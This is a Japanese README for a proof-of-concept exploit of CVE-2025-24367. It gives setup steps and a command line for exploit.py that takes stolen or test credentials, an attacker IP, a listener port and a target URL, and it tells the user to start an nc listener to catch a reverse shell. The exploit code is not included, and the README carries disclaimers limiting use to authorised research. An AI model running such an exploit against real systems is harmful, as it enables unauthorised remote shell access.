
CVE-2025-24367 の概念実証
重要 — 最初にお読みください:
このリポジトリとexploit.pyは教育および研究目的のみで提供されています。明示的な書面による許可がないシステム、ネットワーク、またはサービスに対してこのコードを使用しないでください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。このコードを使用することにより、適用される法律および機関のポリシーに従うことに同意したものとみなされます。
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
スクリプトを実行する前に、nc リスナーが起動していることを確認してください。デバッグ時以外はプロキシなしでスクリプトを実行してください。
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
最終的な注意: このスクリプトと README は教育目的のみです。これらのツールを違法にシステムにアクセスするために使用しないでください。